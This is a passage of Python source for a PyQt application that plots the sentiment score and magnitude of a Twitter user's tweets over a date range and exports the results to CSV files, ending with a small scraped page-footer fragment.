        (dateList, scoreList, magnitudeList, tweetList, errors) = phase2Functions.generate_data_lists(self.twitterApi, self.googleClient, self.get_username(), startDate, endDate)
        QApplication.restoreOverrideCursor()
        # If there were any errors, print them out
        if(len(errors) > 0):
            self.printMessages(errors)
        else:
            # If there are no errors, format and plot out the data
            self.plotData = (dateList, scoreList, magnitudeList)
            self.tweetList = tweetList
            self.figure.clear()
            ax = self.figure.add_subplot(111)
            self.figure.subplots_adjust(top=0.88,
                                        bottom=0.255,
                                        left=0.17,
                                        right=0.9,
                                        hspace=0.2,
                                        wspace=0.2)
            ax.set_title("Sentiment Analysis of @{}'s tweets".format(self.get_username(),))
            ax.set_xlabel("Date")
            ax.set_ylabel("Sentiment Value")
            # Cap the number of x ticks and slant them so dates stay legible.
            ax.xaxis.set_major_locator(plt.MaxNLocator(10))
            for tick in ax.get_xticklabels():
                tick.set_rotation(45)
            ax.plot(self.plotData[0], self.plotData[1], "-bo", label='Sentiment Score')
            ax.plot(self.plotData[0], self.plotData[2], "-ro", label='Sentiment Magnitude')
            ax.legend(loc="lower right")
            self.canvas.draw()
            self.enableExport()

    def get_username(self):
        """Return the Twitter username from the text field."""
        return (self.ui.usernameLineEdit.text())

    def get_start_date(self):
        """Build a ``datetime`` from the start-date spin boxes.

        Returns ``None`` (after showing an error dialog) when the fields
        do not form a valid calendar date.
        """
        start_month = self.ui.startMonthSpinBox.value()
        start_day = self.ui.startDaySpinBox.value()
        start_year = self.ui.startYearSpinBox.value()
        try:
            startDate = datetime.datetime(start_year, start_month, start_day)
        except ValueError:
            # datetime raises ValueError for impossible dates (e.g. Feb 30);
            # the original bare except also hid unrelated bugs.
            self.printMessages(['Start date is improperly set. Check to see that the date is correct/exists.'])
            return None
        return startDate

    def get_end_date(self):
        """Build a ``datetime`` from the end-date spin boxes.

        Returns ``None`` (after showing an error dialog) when the fields
        do not form a valid calendar date.
        """
        end_month = self.ui.endMonthSpinBox.value()
        end_day = self.ui.endDaySpinBox.value()
        end_year = self.ui.endYearSpinBox.value()
        try:
            endDate = datetime.datetime(end_year, end_month, end_day)
        except ValueError:
            self.printMessages(['End date is improperly set. Check to see that the date is correct/exists.'])
            return None
        return endDate

    def enableExport(self):
        """Enable the export button once there is plotted data to save."""
        self.ui.exportPushButton.setEnabled(True)

    def exportValues(self):
        """Export date, score/magnitude, and tweet text to CSV files.

        Writes ``<timestamp>_<username>_score.csv`` and
        ``<timestamp>_<username>_magnitude.csv``, then pops up a
        confirmation dialog.
        """
        currentTimeDate = datetime.datetime.now()
        currentTimeDate = str(currentTimeDate.year)+'-'+str(currentTimeDate.month)+'-'+str(currentTimeDate.day)+'-'+str(currentTimeDate.hour)+'-'+str(currentTimeDate.minute)+'-'+str(currentTimeDate.second)
        # newline='' is required by the csv module so rows are not
        # double-spaced on Windows.
        with open(currentTimeDate+'_'+self.get_username()+'_score.csv', mode='w', newline='') as score_file:
            writer = csv.writer(score_file)
            for i in range(len(self.plotData[0])):
                writer.writerow( [ str(self.plotData[0][i]), self.plotData[1][i],
                                   self.tweetList[i].full_text.encode(encoding='UTF-8', errors='replace') ] )
        with open(currentTimeDate+'_'+self.get_username()+'_magnitude.csv', mode='w', newline='') as magnitude_file:
            writer = csv.writer(magnitude_file)
            for i in range(len(self.plotData[0])):
                writer.writerow( [ str(self.plotData[0][i]), self.plotData[2][i],
                                   self.tweetList[i].full_text.encode(encoding='UTF-8', errors='replace') ] )
        msgBox = QMessageBox()
        msgBox.setText('CSV files exported!')
        msgBox.exec()

    def printMessages(self, messageList):
        """Show every message in *messageList* in one critical dialog."""
        msgBox = QMessageBox()
        msgBox.setIcon(QMessageBox.Critical)
        # Typo fix: "occured" -> "occurred".
        msgBox.setWindowTitle('Errors occurred!')
        tempString = ''
        for message in messageList:
            tempString += (message + '\n')
        msgBox.setText(tempString)
        msgBox.exec()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Ui_Window()
window.show()
sys.exit(app.exec_()) |
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.